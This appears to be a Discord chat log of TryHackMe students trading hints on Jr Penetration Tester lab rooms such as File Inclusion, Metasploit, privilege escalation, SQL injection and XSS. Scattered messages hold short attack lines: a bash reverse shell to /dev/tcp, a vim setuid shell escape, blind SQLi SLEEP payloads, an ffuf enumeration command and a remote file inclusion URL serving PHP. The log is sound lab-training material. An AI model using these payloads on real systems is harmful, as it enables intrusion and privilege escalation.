Gave +1 Rep to @steel nymph

hexed coral
#

Feel free to DM, if anyone having issues or need sanity check ๐Ÿ™‚

wheat wigeon
wheat wigeon
half monolith
wheat wigeon
#

Glad it worked mate

mild blaze
#

File Inclusion Task 5 - Question 2. I cant seem to find the answer in the text.
It asks me what the function is causing the directory traversal in Lab #4 but I can only find the name ||"current directory trick"|| which it doesnt accepts.. can anyone help me in the right direction?

#

I already completed the lab but I dont know the exact name.

#

Thanks!

next lanceBOT
#

Gave +1 Rep to @steel nymph

rustic galleon
#

Hi. May i know tryhackme use what timezone? Just want to know how many hour left before this event end. 27 / 8 right

idle bison
rustic galleon
#

Alright thanks

#

So the promotion will end about 11 hr from now right

idle bison
#

No.

#

Today is the 26th

rustic galleon
#

Owh so its on 11.59 pm on 27

idle bison
#

Midnight.

obsidian vapor
#

Hey, guys! Sorry if it is a dumb question, and especially if this isn't the room I should be asking in, but does this mean that globally the tickets are limited? Like for instance If I am trying to get a 3 month premium ticket, could it be that there are no more left?

idle bison
#

That's not been updated, but yes the number of prizes is limited

obsidian vapor
#

Thank you! That kind of explains why I haven't been able to get anything that I need in those last 3 days ๐Ÿ˜…

idle bison
obsidian vapor
#

That's to be expected, but I just wanted to know whether the limitation is a factor. However, I will keep trying until the event ends. It's an awesome path anyways, and I'm learning a lot from it! ๐Ÿ˜„

wheat wigeon
#

Hi I'm having a trouble with the Metasploit:Exploitation MSFVENOM part, i crafted a linux/x86/meterpreter/reverse_tcp elf and used multi/handler to listen, but every time i use the post /linux/gather/hashdump to collect hashes the exploit crashes and the post exploitation module doesn't work, any hint on what can be going wrong?

#

(Also tried with other post exploitation modules like shell_to_meterpreter and doesn't work either)

oblique sand
#

@wheat wigeon You are on the right track. What error message do you get. If any?

wheat wigeon
#

Well in the victim machine i get Segmentation fault (core dumped), and suddenly closes the connection to the atacker machine where i also get a message in the metasploit:
[!] SESSION may not be compatible with this module.
[] {VICTIM_IP} - Command shell session 1 closed.
[-] Post failed: NameError undefined local variable or method whoami' for #<Msf::Modules::Post__Linux__Gather__Hashdump::MetasploitModule:0x000055dd74616348> [-] Call stack: [-] /usr/share/metasploit-framework/lib/msf/core/post/linux/priv.rb:23:in is_root?'
[-] /usr/share/metasploit-framework/modules/post/linux/gather/hashdump.rb:25:in `run'
[
] Post module execution commpleted

#

(I'm runing both machines as root)

shadow echo
wheat wigeon
#

Nope

#

.elf file works fine

#

just the post exploitation module linux/gather/hashdump

#

after runing it, explodes closing the session

#

maybe has something to do with the architecture?

shadow echo
wheat wigeon
#

meterpreter

#

started listening with the exploit/multi/handler

#

but now that u mention i was never able to execute any command in that session either

shadow echo
wheat wigeon
#

sure both msfvenom and listener are shell_reverse_tcp

#

wait a second

shadow echo
#

It has to be the exact same as the payload you used in msfvenom

wheat wigeon
#

yeah noticed it was slightly different

#

thats probably the issue

#

let me check

#

yeah

#

that was it

wheat wigeon
next lanceBOT
#

Gave +1 Rep to @shadow echo

wheat wigeon
#

ty

novel rover
#

in Metasploit: Exploitation get fail from exploit on "Triggering free of corrupted buffer"

idle bison
#

show options and post a screenshot please

novel rover
idle bison
#

The target can only talk to you via your VPN IP, so that's the IP you need

novel rover
#

oh, i wrote set lhosts (

#

anyway it didnt help

#

its 64, no?

#

payload

idle bison
#

Is that a THM Kali?

novel rover
#

no, my vm

idle bison
#

Then that IP is wrong for certain

#

10.10.x.x is for VMs deployed on THM including attackboxes and THM Kalis

novel rover
#

yes, now it works
thanks)

slender niche
#

I'm kinda a bit stuck and lost, trying to do a bit of research on this but I still don't think I'm grasping it. Working on File Inclusion and stuck on task 5. I'm trying to figure out what it's wanting and doing on the first question, but getting confused reading through everything in the task describes

ornate yarrow
brittle gyro
#

set LHOST tun0 --> twice

next lanceBOT
#

Gave +1 Rep to @ornate yarrow

ornate yarrow
wheat wigeon
distant sorrel
#

Has anyone been having issues with the Linux Priv Escalation tasks?

ornate yarrow
next lanceBOT
#

Gave +1 Rep to @wheat wigeon

distant sorrel
#

I have been attempting Task 6 (sudo) and Task 7 (SUID) rooms. When launching the machine, I will always get a connection error with the machine trying to restart every 15 seconds. I can ssh into the machine via my Attack Box. However, in task 6, I do not see a LD_PRELOAD variable and in task 7 I am not able to nano /etc/shadow. Am I doing something wrong?

strange holly
#

Has any genius succesfully completed this course yet ?

ornate yarrow
#

Blue room wasn't that unstable though. But this room is maybe.

strange holly
#

Is Blue room deliberately on stable you mean @ornate yarrow ?

ornate yarrow
wheat wigeon
# ornate yarrow Oh, good point. Thanks for sharing.

Np! Also another tip when trying to explode eternalblue OSCP likely, when using the zzz_exploit.py scanner you gotta change the SMBUser = "" to SMBUser = Guest if open otherwise it will sometimes show as not exploitable ๐Ÿ˜‰

ornate yarrow
#

automated exploit is a bad practice. everyone should practice manual exploit ๐Ÿ™‚

strange holly
#

Thats super impressive that you peops are almost done! I am having an educational mental down as soo many good courses and promised myself not too touch another until I complete those already paid for. This course looks sooo juicy.

modest arch
dusky saddle
#

try to make them execs

modest arch
#

Yes I did. I also ran pspy64.

dusky saddle
#

chmod +x {script_name}

modest arch
#

wow

#

what a mistake

ornate yarrow
#

completed 30 seconds ago

dusky saddle
ornate yarrow
#

easy bro. where did you stuck?

dusky saddle
#

btw can anyone help me with file inclusion?

#

dms?

ornate yarrow
#

sorry, selected wrong reply.

modest arch
next lanceBOT
#

Gave +1 Rep to @dusky saddle

dusk mica
#

Hello

modest arch
#

Hi, I'm still stuck with the dll task of the Windows Privesc room, can I have some help plz? ๐Ÿ™‚
I think I have the correct dll, I have stop/ start the dllsvc service. But I don't see the jack's account.. how am I supposed to login? @sterile crescent said yesterday with ||-credential ""||, but still I don't know how to do it.. ^^

#

yes

#

how? that what I don't get.

red solstice
#

Hi, I stuck at Linux PrivEsc Task 9 privilege escalation with Cron Jobs. I stuck on reverse shell, I already edit the file backup.sh for reverse shell but it didnt work. I am not sure what I missed

modest arch
#

hey i'm using the AttackBox.. that's what is going wrong you think?

red solstice
#

Thank you. Oh my god what a mistake!

next lanceBOT
#

Gave +1 Rep to @steel nymph

subtle forge
#

Hello everyone. I am having a tough time getting through the task 5 of Linux PrivEsc from jr pentester.
I have download the exploit code for the vulnerability to the attackbox. its a .txt file which I have also transferred to the target machine using wget. but How do I run this .txt exploit file?? :/

lusty bolt
#

well what language is the code inside

distant sorrel
#

Anyone provide me with a hint in obtaining the hash of Frank's password in Task 6 (sudo)?

subtle forge
#

Thanks @lusty bolt

next lanceBOT
#

Gave +1 Rep to @lusty bolt

distant sorrel
#

Ah - I was able to finally able to get to Karen with the LD_Preload variable

cosmic quest
#

Hi everyone , I have a problem with Authentication Bypass Task 2. FFUF does not give me any result.

distant sorrel
#

Apologizes - I misspoke.

inner ether
#

Does anyone know if we reset the rooms will we get different Tickets or the same ones?

cosmic quest
#

Again no result . I save outputs to valid_usernames.txt file . "results: []" is empty.

#

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.116.231/customers/signup -mr "username already exists"

loud spire
#

What other binary can be used through its capabilities?

#

task 8

#

what is it asking ?

cosmic quest
#

I do that with -o valid_usernames.txt

subtle forge
# lusty bolt well what language is the code inside

okay so its a code written in c. downloaded the exploit to attackbox. Transferred the file to target machine via wget. moved it to a directory like /tmp. to run the code, used the command "./filename.c" but get permission denied

cosmic quest
#

in Attackbox

cosmic quest
#

It creates the file , writes outputs and in that file I see , "results" :[]; it is empty . Other things are like "stop_errors" : false , "stop_403":false.

slender niche
#

Thanks, I had tried that previously, but I guess I didn't format it right on that side.

next lanceBOT
#

Gave +1 Rep to @steel nymph

subtle forge
lusty bolt
#

yes

cosmic quest
#

I did both you say , but problem continued for me . I am going to try again , as you say...

subtle forge
next lanceBOT
#

Gave +1 Rep to @lusty bolt

loud spire
#

any one can help me with this ?

#

that's what i am asking, that what the question is saying i am unable to understand

vital depot
#

Hey ๐Ÿ‘‹ On task 8 File Inclusion, Gain RCE - Can I get execution via CURL or do I have to set up a listener and search for an exploit?

modest arch
#

@cosmic quest Are you getting any results in your terminal windows without adding a > or -o option to your command?

twilit yoke
#

File Inclusion was harder tbh

vital depot
#

With an http.server for ex?

distant scroll
#

anyone here completed windows privilage esclation?

proven glen
#

hey whats the exact time of end for give away on jr penetration testing path???

modest arch
#

Thanks @steel nymph ! but I not able to connect via rdp neither..

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Did you connect from the VM with xrdp?

distant scroll
#

@steel nymph can i dm you?

cosmic quest
#

Thanks @steel nymph @modest arch

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Can anyone help me with this?

wanton jolt
#

you forgot the period

#

to download in the current directory

modest arch
wanton jolt
#

you're calling scp correctly but you're not telling it where to download the file

modest arch
#

oh no how do I add that

wanton jolt
#

so it's hitting the dir, seeing there's data there, but you need to specify where to put it.
"scp pentester@<IP>:/home/pentester* ."

#

just redo the command and add a period

modest arch
#

k

wanton jolt
#

period is synonymous with <current directory>, you can specify different endpoints by replacing it.

#

so "scp pentester@<IP>:/home/pentester* ~/Downloads" would put it in your home Downloads folder without you having to actually cd into the dir

dusky saddle
#

thanks @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Thanks @wanton jolt

next lanceBOT
#

Gave +1 Rep to @wanton jolt

wanton jolt
#

๐Ÿฅณ

bronze fulcrum
#

Does someone know why I get in every room the same tickets?

shadow echo
bronze fulcrum
shadow echo
modest arch
#

@steel nymph hi can you help my with something? on xss last part is not working with the decoded version and i dont know why

#

What is the value of the staff-session cookie?

#

tryed with echo and web base..

river cape
#

Can you please help me in this task I face a problem in this task.

modest arch
#

echo then the encoded | base64 -d

#

same for both i think is something wrong

river cape
#

Thanks for your response. It's lots to me.

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
lusty bolt
#

in linprivesc task 8, I try to run ||vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh/", "sh", "-c", "reset; exec sh")'||, but I get a permission denied error

#

isn't that command supposed to work?

twilit yoke
#

SQL injection task 5, after this line my error should have been gone, what am i missing?

lusty bolt
#

oh

#

thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

lusty bolt
#

oh, now I get this error

twilit yoke
#

@steel nymph

#

i dont understand

mellow karma
#

@steel nymphCan I DM you ?

brittle gyro
#

so did you guys get tickets for each room you completed for this or just certain ones? I did most of these rooms prior to the path was created and only got tickets for the ones I didn't already complete

lusty bolt
#

wait, I think I typed the command wrong

#

yeah, got it

idle bison
#

Ah, dangerous thing with that method

#

echo adds a newline at the end

deft valley
brittle gyro
#

oh lol, screw the tickets then. I'm definitely not going through them all again

deft valley
#

hahaha

brittle gyro
#

tthanks @deft valley

deft valley
#

welcome

lusty bolt
#

i've been waiting two minutes now and I still haven't got the reverse shell from the crontab

#

in linprivesc

modest arch
#

The command "sc stop ddlsvc & sc start ddlsvc" don't work for me.. it says "ControlService FAILED 1052". Do you have an idea why? (I'm still on Windwos Privesc..!)

lusty bolt
#

what so just try ./script.sh

modest arch
lusty bolt
#

then no I can't

#

permission denied

#

? hmm

deft valley
#

and check directory

lusty bolt
#

I'm using ||bash -i >& /dev/tcp/tun0/7777 0>&1||

mellow karma
#

Thank you @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

deft valley
modest arch
next lanceBOT
#

Gave +1 Rep to @deft valley

lusty bolt
#

got it thanks

deft valley
drowsy sparrow
#

anyone able to help with File Inclusion: Task 4, LFI step 1. When I input what I believe to be the answer it tells me it is wrong with error "Uh-oh! undefined" Not sure if I'm missing something here.

drowsy sparrow
#

What I thought and I tried it in two different browsers. Yes, is it catching the submission and blocking it?

ember yarrow
#

Mhm

#

Whitelist our website and it should fix your issue:)

drowsy sparrow
#

K what I was thinking. Ok sounds good.

#

TY

modest arch
deft valley
#

try restart then

modest arch
#

yeah I will! though that's likely to be the tenth time I restart (not kidding ^^)

wet gulch
#

can i get a hint or some help with file inclusion task 8, the first challenge, im trying to send a post request with curl maybe im formatting the curl wrong but i cant seem to find flag1

marble hamlet
#

outputted my ffuf results into customers.txt, any idea why it is displayed like this once i open that file?

modest arch
#

anyone manage to get the good cookie for the last part in XSS i cant manage to get the good one

lusty bolt
#

I'm trying to compile with gcc for linprivesc task 10, but ...

#

What do I do

#

I don't really know if what I'm doing is even right

deft valley
#

u compile from ur machine

deep scaffold
deft valley
#

attack machine

lusty bolt
#

oh yeah that would make sense facepalm

modest arch
# deft valley try restart then

So I've restarted, but I'm getting the same pb. With the cmd prompt "sc stop dllsvc" doesn't work, and with task manager I still getting "access denied" when I click end of task (and I don't see start/stop button)

deft valley
#

did u go to task manager/services/dllsvc?

modest arch
deep scaffold
deft valley
#

idk then

modest arch
lusty bolt
#

now I get permission denied when trying to run ./path :(

#

help pls

vital depot
#

Eyooo
File Inclusion help please - Gain RCE :-
||Started http.server on 1234.
Made PHP file - cmd.txt
Injected malicious URL - http://10.10.155.108/playground.php?file=http://10.10.1.28:1234/cmd.txt
I've tried -
<?PHP shell_exec('hostname'); ?>
and
<?PHP echo gethostname(); ?>||
I'm getting a 200 response but I'm not getting the hostname in the browser.
Is my PHP snippet incorrect?

deep scaffold
lusty bolt
#

is that your tun0 ip
might wanna remove that

polar depot
#

It feels great to get tickets for completing rooms on the new Jr Pentester path, specially when they complete 3 of the same. Two more prizes won ๐Ÿ™‚ ๐Ÿฅณ

vital depot
lusty bolt
#

oh attackbox is fine

deep scaffold
lusty bolt
#

then I have this in the thm file ||cat /home/matt/flag6.txt||

vital depot
lusty bolt
#

you're good at this

#

unlike me

#

ik but I don't really understand this at all

vital depot
#

||/var/www/html??||

sweet wharf
#

I dont know if its just me but im having some real issues with the request time on the the Time Based Blind SQLi - its so hit and miss if the Request time will populate with the sleep time.

EDIT: Anyone that has problems with this the example 'u%';-- is not the first character of the database name try other letters it will work.

dreamy sundial
#

can any1 help me with the path for flag1.txt in linux privesc final task please

#

ya

vital depot
#

Format error ๐Ÿ˜„ I fixed it n all goooood coolguy

dreamy sundial
#

but i want to know the actual method

next lanceBOT
#

Gave +1 Rep to @steel nymph

vital depot
#

Thanks @steel nymph Nice one for helping today ๐Ÿค™

viral token
#

SQL Injection Task 8: Stuck here: https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = '{what_i_find}' and table_name like 'z%';--

any hints for me?

got stuck on table_name...

#

okay, let me cross check....

long sky
#

just finished this pathway! HOLY COW i learned alot

viral token
#

I cross checked its has a multiple number of a single charterer....

long sky
#

unfortunately didnt get any of the tickets i wanted XD

viral token
#

do I need to check other characters like ^ ( etc?

#

how can I add spoiler with my post?

novel rover
#

|| both sides

viral token
#

ok

#

|| sql______ ||

#

okay

novel rover
#

i got different, but that is also wrong(

deft valley
#

i admire to ur patience, haha

deep scaffold
#

๐Ÿ‘

novel rover
#

so we must somehow change _ to other symbol ?
or send smth like "\__"

viral token
#

now I know thanks @steel nymph let me try again

next lanceBOT
#

Gave +1 Rep to @steel nymph

#

Gave +1 Rep to @steel nymph

novel rover
#

oh, nice, seems i have a correct db name now)
thanks

#

i checked with database() = 'name' and it returned "true"
but when i try admin123' UNION SELECT SLEEP(5),2 WHERE table_schema = 'name' and table_name like'%';-- get "false"
it makes me crazy(

viral token
#

|| sqli_four% and sqli_four || both are giving me 5 sec, what does it mean? should I dig more?

#

thank you!

next lanceBOT
#

Gave +1 Rep to @steel nymph

novel rover
#

but i just copied query from previous task

twilit yoke
peak lotus
lusty bolt
#

yep

peak lotus
novel rover
next lanceBOT
#

Gave +1 Rep to @twilit yoke

twilit yoke
#

my first rep๐Ÿ˜Ž

novel rover
#

hmm, _ is last in array of chars
but when i get answer half of letters are changed by _
strange things

copper sentinel
#

hey guys, can i have a hint for lfi challenge 1 ? i've tried changing to post method using curl, dev-tools or burp while trying a lot of query but without success...

modest arch
#

I actually don't get what I'm doing wrong ||admin123' UNION SELECT SLEEP(2),2 FROM information_schema.tables where table_schema = 'sqli_four' AND table_name = 'users' AND column_name like '%[]%';--||

near vapor
#

How can I bypass a LIF filter that is filtering /
I tried to url encode but didn't work.

modest arch
deft valley
modest arch
#

that's what i understood from the link

#

By running the queries below you will see the difference between using other wildcard characters in the LIKE clause enclosed in the brackets and without (in the last query it is not necessary to include '[' in the brackets):

USE TestDB
GO

-- %
SELECT *
FROM myUser
WHERE LoginName LIKE '%%%'

SELECT *
FROM myUser
WHERE LoginName LIKE '%[%]%'

-- [
SELECT *
FROM myUser
WHERE LoginName LIKE '%[%'

SELECT *
FROM myUser
WHERE LoginName LIKE '%[[]%'

-- ]
SELECT *
FROM myUser
WHERE LoginName LIKE '%]%'

bleak pilot
#

you're not wrong @steel nymph

hearty cairn
#

The Linux PrivEsc room was simply amazing. It has helped me refresh a ton of privesc methods.

For anyone interested, kernel exploits can also be found in the Metasploit Framework. You just need to create an ssh session inside the MSF, using the appropriate module and the credentials that have been provided to you) and simply run the exploit.

modest arch
next lanceBOT
#

Gave +1 Rep to @deft valley

modest arch
#

thanks everyone ๐Ÿ™‚

deft valley
#

no problem, be attentive

modest arch
next lanceBOT
#

Gave +1 Rep to @deft valley

novel rover
#

sleep(5) does it mean superextratrue?

viral token
#

||admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME like 'id' and COLUMN_NAME !='domain';|| how could I find more column?

pale parcel
#

hi is there anybody who has done xss room?

copper sentinel
#

i've tried putting the query in the body and still nothing, i don't know what i'm missing, thx for the answer though

next lanceBOT
#

Gave +1 Rep to @steel nymph

pale parcel
#

What is the value of the staff-session cookie?
i need help with this question

#

restart which box?

noble rose
#

Im on the XSS as well